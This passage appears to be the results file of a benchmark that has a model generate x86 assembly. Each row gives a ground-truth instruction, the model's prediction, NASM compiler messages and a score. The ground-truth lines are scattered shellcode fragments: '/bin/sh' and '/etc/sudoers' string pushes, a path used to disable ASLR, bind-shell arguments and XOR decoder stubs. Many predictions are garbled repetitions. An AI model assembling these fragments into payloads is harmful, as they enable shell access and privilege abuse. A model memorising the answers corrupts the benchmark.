exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: byte data exceeds bounds [-w+number-overflow] +";1 +pop cx;pop cx;Matched with ground truth;1 +push 0x6475732f \\n push 0x6374652f \\n mov eax, esp;push 0x6475732f \\n push 0x6374652f \\n mov eax, esp;Matched with ground truth;1 +mov ecx, esp;mov ecx, args;"assembly_instruction.asm:1: error: symbol `args' not defined +";1 +cmp al, 0xf2;cmp al, 0xf2;Matched with ground truth;1 +db 0c6h;db '0c6h';No compiler errors;1 +cmp eax, eax \\n jne 0x8;cmp eax, eax \\n jne 0x8;Matched with ground truth;1 +xor ax, 0x3041;xor ax, 0x3041;Matched with ground truth;1 +jnz decode;jz _decode;"assembly_instruction.asm:1: error: symbol `_decode' not defined +";1 +pop ecx \\n mov edi, ecx;pop ecx \\n pop stak \\n mov edi, esp;"assembly_instruction.asm:2: error: symbol `stak' not defined +";0 +add eax, ebx;add eax, ebx;Matched with ground truth;1 +push 0x2f2f2f2f \\n mov esi, esp;push 0x2f2f2f2f \\n mov esi, esp;Matched with ground truth;1 +mov cl, al;backup al;"assembly_instruction.asm:1: error: parser: instruction expected +";0 +push ecx;push host_sockfd;"assembly_instruction.asm:1: error: symbol `host_sockfd' not defined +";1 +find_address:;find_address:;Matched with ground truth;1 +shl edx, 9;shl edx, 9;Matched with ground truth;1 +dup2:;_dup2:;No compiler errors;1 +three:;_three:;No compiler errors;1 +L1: \\n jmp short esp;jmp short esp;"assembly_instruction.asm:1: warning: invalid register size specification ignored [-w+regsize] +";1 +push byte 10;push byte 10;Matched with ground truth;1 +wrap_around:;_wrap_around:;No compiler errors;1 +cmp bl, 78h \\n jge short loc_402B1D;cmp bl, 78h \\n jge loc_402B1D;"assembly_instruction.asm:2: error: symbol `loc_402B1D' not defined +";1 +_start: \\n jmp short enc;_start: \\n jmp short enc;Matched with ground truth;1 +push word 0x5c11;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +read:;read_label:;No compiler errors;1 +mov bl, byte [edi];mov bl, byte [edi];Matched with ground truth;1 +db '/bin/sh';db '/bin/sh';Matched with ground truth;1 +priv_setgid:;_ priv_setgid:;"assembly_instruction.asm:1: error: parser: instruction expected +";0 +sub edx, edx;xor edx, edx;No compiler errors;1 +mov bl, 4;mov: \\n =: \\n var2: \\n sys_listen: \\n bl:;"assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:5: error: label or instruction expected at start of line +";0 +mov ecx, esp;mov ecx, ptr;"assembly_instruction.asm:1: warning: `ptr' is not a NASM keyword [-w+ptr] +assembly_instruction.asm:1: error: symbol `ptr' not defined +";0 +mov ebx, esp;ebx:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +cdq \\n push edx;xor edx, edx \\n push edx;No compiler errors;1 +xor bl, 0xaa \\n jne encodedshellcode;xor bl, 0xaa \\n jnz encodedshellcode;"assembly_instruction.asm:2: error: symbol `encodedshellcode' not defined +";1 +xor edx, edx;xor edx, edx;Matched with ground truth;1 +push 0x6374652f \\n mov esi, esp;push 0x6374652f \\n mov esi, esp;Matched with ground truth;1 +push byte 0x2 \\n pop eax;push byte 0x2 \\n pop eax;Matched with ground truth;1 +sub ecx, ecx;sub ecx, ecx;Matched with ground truth;1 +xor edx, edx \\n mov dl, 5;xor edx, edx \\n mov byte [edx], 5;No compiler errors;1 +jmp short stage;jmp short _stage;"assembly_instruction.asm:1: error: symbol `_stage' not defined +";1 +sub ax, 1564;sub ax, 1564;Matched with ground truth;1 +shell_ret:;shell_ret:;Matched with ground truth;1 +mov cx,0x3b30 \\n push cx;push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n;"assembly_instruction.asm:21: error: comma, colon, decorator or end of line expected after operand +";0 +cmp byte [buff], 7ah;cmp byte [buff], 7ah;Matched with ground truth;1 +push 0x67513231;push 0x67513231;Matched with ground truth;1 +push 2;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +";1 +push 0x10;push 0x10;Matched with ground truth;1 +push eax \\n pop edx;mov edx, eax;No compiler errors;1 +message: db 'hello world!';message db 'hello world!';No compiler errors;1 +mov eax, 3;mov sys_read, esp;"assembly_instruction.asm:1: error: symbol `sys_read' not defined +";0 +db 'egg mark';db 'egg mark';Matched with ground truth;1 +xor edx, edx;xor edx, edx;Matched with ground truth;1 +jmp short push_cmd;jmp short push_cmd;Matched with ground truth;1 +decode:;decode:;Matched with ground truth;1 +xor cl, 0x32;xor cl, 0x32;Matched with ground truth;1 +cmp bl, 0xbb \\n je xordecode \\n jmp notdecode;cmp bl, 0xbb \\n jge xordecode \\n jmp notdecode;"assembly_instruction.asm:2: error: symbol `xordecode' not defined +assembly_instruction.asm:3: error: symbol `notdecode' not defined +";1 +mov ebx, [ebp-4];push [\\n pop ebp-4 \\n pop] \\n pop ebx;"assembly_instruction.asm:1: error: expression syntax error +assembly_instruction.asm:3: error: expression syntax error +";0 +push byte +0x68;push byte +0x68;Matched with ground truth;1 +mov cx, 0700;mov cx, 0700;Matched with ground truth;1 +cdq;edx:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +mov al, 0xcd;mov al, 0xcd;Matched with ground truth;1 +xor cl, 0xaa;xor cl, 0xaa;Matched with ground truth;1 +cmp al, 0xf2;cmp al, 0xf2;Matched with ground truth;1 +mov al, 11;mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +";1 +push 15 \\n mov ecx, esp;push ecx \\n mov ecx, 15;No compiler errors;1 +xchg eax, ebx;xchg eax, ebx;Matched with ground truth;1 +push byte 16 \\n pop eax;push byte 16 \\n pop eax;Matched with ground truth;1 +mov long [esi+26], eax;mov eax, [esi+26];No compiler errors;1 +mov dword [esp-0x4],eax \\n mov dword [esp-0x8],0x65636170 \\n mov dword [esp-0xc],0x735f6176 \\n mov dword [esp-0x10],0x5f657a69 \\n mov dword [esp-0x14],0x6d6f646e \\n mov dword [esp-0x18],0x61722f6c \\n mov dword [esp-0x1c],0x656e7265 \\n mov dword [esp-0x20],0x6b2f7379 \\n mov dword [esp-0x24],0x732f636f \\n mov dword [esp-0x28],0x72702f2f \\n sub esp,0x28 \\n mov ebx,esp;push proc/sys/kernel/randomize_va_space \\n push eax \\n mov ebx, esp;"assembly_instruction.asm:1: error: symbol `proc' not defined +";0 +mov bl, 0x2;mov bl, 0x2;Matched with ground truth;1 +push 0x37333333 \\n push 0x3170762d;push '-vp13337';"assembly_instruction.asm:1: warning: character constant too long [-w+other] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +";1 +push 0x2f2f2f2f;push 0x2f2f2f2f;Matched with ground truth;1 +lea esi, [esi +4];push [\\n pop esi +4;"assembly_instruction.asm:1: error: expression syntax error +";0 +scasd;cmp dword [edi], eax;No compiler errors;1 +mov ecx,esp;mov ecx, esp;Matched with ground truth;1 +mov eax, [ebx+8];mov eax, byte [ebx+8];"assembly_instruction.asm:1: error: mismatch in operand sizes +";0 +bound esp,qword ptr [ebx+0x41];bound ebx, 0x68732f2f, 0x6e69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +push ebx;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +";1 +int 3;mov breakpoint, esp;"assembly_instruction.asm:1: error: symbol `breakpoint' not defined +";0 +xor ecx, ecx \\n xor eax, eax \\n xor edx, edx;xor ecx, ecx \\n xor eax, eax \\n xor edx, edx;Matched with ground truth;1 +push 0x10 \\n push ecx \\n push edx;push sizeof(struct;"assembly_instruction.asm:1: error: comma, colon, decorator or end of line expected after operand +";0 +cmp bl, 0xaa \\n je shellcode;cmp bl, 0xaa \\n jz shellcode;"assembly_instruction.asm:2: error: symbol `shellcode' not defined +";1 +push edx \\n mov ecx, esp;push edx \\n mov ecx, esp;Matched with ground truth;1 +mov bl, 0xff;pop bl;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +xor eax, eax \\n xor edx, edx;xor eax, eax \\n xor edx, edx;Matched with ground truth;1 +mov al,2;mov al, __nr_fork;"assembly_instruction.asm:1: error: symbol `__nr_fork' not defined +";1 +cmp ecx, ebp;cmp ecx, ebp;Matched with ground truth;1 +xchg esp, esi;xchg esi, esp;No compiler errors;1 +push dword ebx \\n push dword ebx;push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2;No compiler errors;1 +push 0x6d726574;push 0x6d726574;Matched with ground truth;1 +mov al, 0x3f;push sys \\n push for \\n push dup2 \\n mov al, 0x68732f2f \\n mov dup2, 0x6e69622f \\n mov for, 0x69622f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f2f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f;"assembly_instruction.asm:1: error: symbol `sys' not defined +assembly_instruction.asm:2: error: symbol `for' not defined +assembly_instruction.asm:3: error: symbol `dup2' not defined +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: symbol `dup2' not defined +assembly_instruction.asm:6: error: symbol `for' not defined +assembly_instruction.asm:7: error: symbol `dup2' not defined +assembly_instruction.asm:8: error: symbol `dup2' not defined +assembly_instruction.asm:9: error: symbol `for' not defined +assembly_instruction.asm:10: error: symbol `dup2' not defined +assembly_instruction.asm:11: error: symbol `dup2' not defined +assembly_instruction.asm:12: error: symbol `for' not defined +";0 +call decoder;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +";1 +test al, al \\n jz found \\n inc ecx;cmp al, ecx \\n jz found \\n inc ecx;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +assembly_instruction.asm:2: error: symbol `found' not defined +";0 +mov bl, 5;mov bl, 5;Matched with ground truth;1 +int 0x80;int 0x80;Matched with ground truth;1 +marks dw 0, 0, 0, 0;for: dd 0x68732f \\n dd 0x68732f \\n dd 0x6e69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x6;No compiler errors;1 +push eax;push edx;No compiler errors;1 +sub eax, 0x013ffeff \\n push eax;push ' in/c';"assembly_instruction.asm:1: warning: character constant too long [-w+other] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +";1 +xor ebx, ebx \\n mov ebx, eax;xor ebx, ebx \\n mov eax, eax;No compiler errors;1 +pop esi;pop esi;Matched with ground truth;1 +mov al, 102 \\n int 80h;push 0x68732f2f \\n push 0x6e69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +";1 +push ebx;push ebx;Matched with ground truth;1 +xchg ebx, ecx;xchg ecx, ebx;No compiler errors;1 +mov ecx,eax \\n push ecx;mov ecx, eax \\n push ecx;Matched with ground truth;1 +add ax, bx;add ax, bx;Matched with ground truth;1 +decode:;decode:;Matched with ground truth;1 +push byte 0x77;push byte 0x77;Matched with ground truth;1 +lea ebx, [esp];mov ebx, esp;No compiler errors;1 +push eax \\n push dword 0x64616568 \\n push dword 0x2f6e6962 \\n push dword 0x2f2f2f2f \\n push dword 0x7273752f;push 0-term \\n push daeh \\n push rsu/ on;"assembly_instruction.asm:1: error: symbol `term' not defined +assembly_instruction.asm:2: error: symbol `daeh' not defined +assembly_instruction.asm:3: error: symbol `rsu' not defined +";0 +push ebx;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +xor eax, 0xffffffff;xor 0xffffffff, 0xffffffff \\n xor eax, eax;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +add al,0x3b;add al, 0x3b;Matched with ground truth;1 +mov [esi], al;mov esi, al;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +mov eax, 1;mov eax, 1;Matched with ground truth;1 +xor ebx, ebx \\n push ebx;push edx;No compiler errors;1 +push eax \\n mov edx, esp \\n push ebx \\n mov ecx, esp \\n mov al, 0xb \\n int 0x80;int 0x80;No compiler errors;1 +entrypoint:;entrypoint:;Matched with ground truth;1 +mov dl, 0x1c;mov dl, 0x1c;Matched with ground truth;1 +sub byte [ebp+ecx],20h;sub ecx, 20h;No compiler errors;1 +push ecx;push ecx;Matched with ground truth;1 +mov ebx, esp;mov ebx, esp;Matched with ground truth;1 +mov edi, 0x3734b117;mov edi, 0x3734b117;Matched with ground truth;1 +xor byte [esi + ecx - 1], 0x3;xor byte [esi + ecx - 1], bh;No compiler errors;1 +sub byte [esi], 13;sub byte [esi], 13;Matched with ground truth;1 +push eax;push eax(socket;"assembly_instruction.asm:1: error: comma, colon, decorator or end of line expected after operand +";0 +mov edx, ecx;mov edx, esp;No compiler errors;1 +mov [ebx+8], ebx;mov [ebx + 8], ebx;Matched with ground truth;1 +push 0x2 \\n pop ecx;push 0x2 \\n pop ecx;Matched with ground truth;1 +lea edx, [esi+0x10];lea edx, [esi+0x10];Matched with ground truth;1 +mov eax, 19;mov byte [esi], 0x68732f2f \\n mov byte [esi], 0x68732f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f2f \\n mov byte [esi], 0x69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +";1 +arr1 resb 400;push byte 0x68732f2f \\n push byte 0x68732f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov uninitialized, esp;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: symbol `uninitialized' not defined +";0 +xor cl, 0XAA \\n jz shift_decode;xor cl, 0xAA \\n jz shift_decode;"assembly_instruction.asm:2: error: symbol `shift_decode' not defined +";1 +nop;xor eax, 0x68732f2f \\n xor eax, 0x68732f \\n xor eax, 0x6e69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f;No compiler errors;1 +decoded_shellcode: \\n call [esp];decoded_shellcode: \\n call stack;"assembly_instruction.asm:2: error: symbol `stack' not defined +";1 +mov eax, 90;mov eax, 0x68732f2f \\n mov eax, 0x68732f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f2f \\n mov eax, 0x69622f;No compiler errors;1 +cmp ax, bx \\n jne l3 \\n jmp while;cmp ax, bx \\n jne while;"assembly_instruction.asm:2: error: symbol `while' not defined +";1 +format:;format:;Matched with ground truth;1 +mul ebx;mul ebx;Matched with ground truth;1 +lea edi, [esi];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov edi, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +";1 +push edx;push edx;Matched with ground truth;1 +L4: \\n jmp short esp;L4: \\n jmp short stack;"assembly_instruction.asm:2: error: symbol `stack' not defined +";1 +push dword 0x8140a8c0;push dword 0x8140a8c0;Matched with ground truth;1 +mov esi, 10;mov esi, 10;Matched with ground truth;1 +jmp short setup;jmp short _setup;"assembly_instruction.asm:1: error: symbol `_setup' not defined +";1 +push 0x6e69622f \\n push 0x7273752f \\n mov ebx, esp;push 0x6e69622f \\n push 0x7273752f \\n mov ebx, esp;Matched with ground truth;1 +hlt;xor until, until \\n sub until, 0x68732f2f \\n sub until, 0x6e69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x;"assembly_instruction.asm:1: error: symbol `until' not defined +assembly_instruction.asm:2: error: symbol `until' not defined +assembly_instruction.asm:3: error: symbol `until' not defined +assembly_instruction.asm:4: error: symbol `until' not defined +assembly_instruction.asm:5: error: symbol `until' not defined +assembly_instruction.asm:6: error: symbol `until' not defined +assembly_instruction.asm:7: error: symbol `until' not defined +assembly_instruction.asm:8: error: symbol `until' not defined +assembly_instruction.asm:9: error: symbol `until' not defined +assembly_instruction.asm:10: error: symbol `until' not defined +assembly_instruction.asm:11: error: symbol `until' not defined +";0 +mov eax, edx;mov eax, edx;Matched with ground truth;1 +call _myfunc;call _myfunc;Matched with ground truth;1 +sub byte [esi], 0xd;sub byte [esi], 0xd;Matched with ground truth;1 +push edx;push edx;Matched with ground truth;1 +cmp ecx, 5;cmp ecx, 5;Matched with ground truth;1 +jns decode_pr;jns decode_pr;Matched with ground truth;1 +zero1e:;_zero1e:;No compiler errors;1 +int 80h;call sys_read;"assembly_instruction.asm:1: error: symbol `sys_read' not defined +";1 +push ecx \\n push 0x68736162 \\n push 0x2f6e6962 \\n push 0x2f2f2f2f;push ecx \\n push cotent \\n push 'hsab' \\n push '/nib' \\n push '////';"assembly_instruction.asm:2: error: symbol `cotent' not defined +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +";0 +"call _appendfile \\n msg2 db ""passwd"", 0x00";inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc istruction \\n inc istruction \\n inc istruction \\n inc istruction \\n inc pf;"assembly_instruction.asm:1: error: symbol `_appendfile' not defined +assembly_instruction.asm:2: error: symbol `_appendfile' not defined +assembly_instruction.asm:3: error: symbol `_appendfile' not defined +assembly_instruction.asm:4: error: symbol `_appendfile' not defined +assembly_instruction.asm:5: error: symbol `_appendfile' not defined +assembly_instruction.asm:6: error: symbol `_appendfile' not defined +assembly_instruction.asm:7: error: symbol `_appendfile' not defined +assembly_instruction.asm:8: error: symbol `_appendfile' not defined +assembly_instruction.asm:9: error: symbol `_appendfile' not defined +assembly_instruction.asm:10: error: symbol `_appendfile' not defined +assembly_instruction.asm:11: error: symbol `_appendfile' not defined +assembly_instruction.asm:12: error: symbol `_appendfile' not defined +assembly_instruction.asm:13: error: symbol `_appendfile' not defined +assembly_instruction.asm:14: error: symbol `istruction' not defined +assembly_instruction.asm:15: error: symbol `istruction' not defined +assembly_instruction.asm:16: error: symbol `istruction' not defined +assembly_instruction.asm:17: error: symbol `istruction' not defined +assembly_instruction.asm:18: error: symbol `pf' not defined +";0 +xor ecx, ecx \\n mul ecx;xor eax, eax \\n xor edx, edx;No compiler errors;1 +D2: \\n not byte [esi];D2: \\n not byte [esi];Matched with ground truth;1 +mul ebx;xor eax, eax;No compiler errors;1 +_write:;_write:;Matched with ground truth;1 +inc cl;inc cl \\n inc cl;No compiler errors;1 +mov esi, 0x353ffc3b;mov esi, 0x353ffc3b;Matched with ground truth;1 +mov ecx, edx;mov ecx, edx;Matched with ground truth;1 +inc ebx;inc ebx;Matched with ground truth;1 +push 0x78;push 0x78;Matched with ground truth;1 +mov ecx,esp;mov ecx, esp;Matched with ground truth;1 +xor ah, ah;xor ah, ah;Matched with ground truth;1 +_load_data:;_load_data:;Matched with ground truth;1 +push ebx \\n push ebx \\n push esi;push ebx \\n push esi;No compiler errors;1 +test eax, eax \\n jnz checkforfile;test eax, eax \\n jz checkforfile;"assembly_instruction.asm:2: error: symbol `checkforfile' not defined +";1 +push edx;push edx;Matched with ground truth;1 +mov cl,0x2;mov cl, 2;No compiler errors;1 +rol edx, 0x4;rol edx, 4;No compiler errors;1 +mov edi, ecx;mov edi, ecx;Matched with ground truth;1 +mov edi, edx;mov edi, edi;No compiler errors;1 +xor ebx,eax;xor ebx, ebx \\n xor eax, eax;No compiler errors;1 +push byte 67 \\n pop eax;push byte 67 \\n pop eax;Matched with ground truth;1 +mov esi, eax;mov esi, eax;Matched with ground truth;1 +push ebx;push ebx;Matched with ground truth;1 +mov dl, 0x02;mov dl, 0x02;Matched with ground truth;1 +lea edi, [esi +1];mov edi, [esi];No compiler errors;1 +sub ebx, 0x2e2aa163;sub ebx, 0x2e2aa163;Matched with ground truth;1 +xor bx, bx;xor bx, bx;Matched with ground truth;1 +F2: \\n call function_1;F2: \\n call function1;"assembly_instruction.asm:2: error: symbol `function1' not defined +";1 +xor ecx, ecx \\n mul ecx;xor ecx, ecx \\n mul ecx;Matched with ground truth;1 +cmp al, 0xf2 \\n jz next_page;test efault, efault \\n jmp next_page;"assembly_instruction.asm:1: error: symbol `efault' not defined +assembly_instruction.asm:2: error: symbol `next_page' not defined +";0 +int 0x80;init:;No compiler errors;1 +div edx;div edx;Matched with ground truth;1 +mov eax, [x];mov eax, [x];Matched with ground truth;1 +cmp eax, ebx \\n je all;cmp eax, ebx \\n jne all;"assembly_instruction.asm:2: error: symbol `all' not defined +";1 +my_table times 10 dw 0;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov my_table, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds 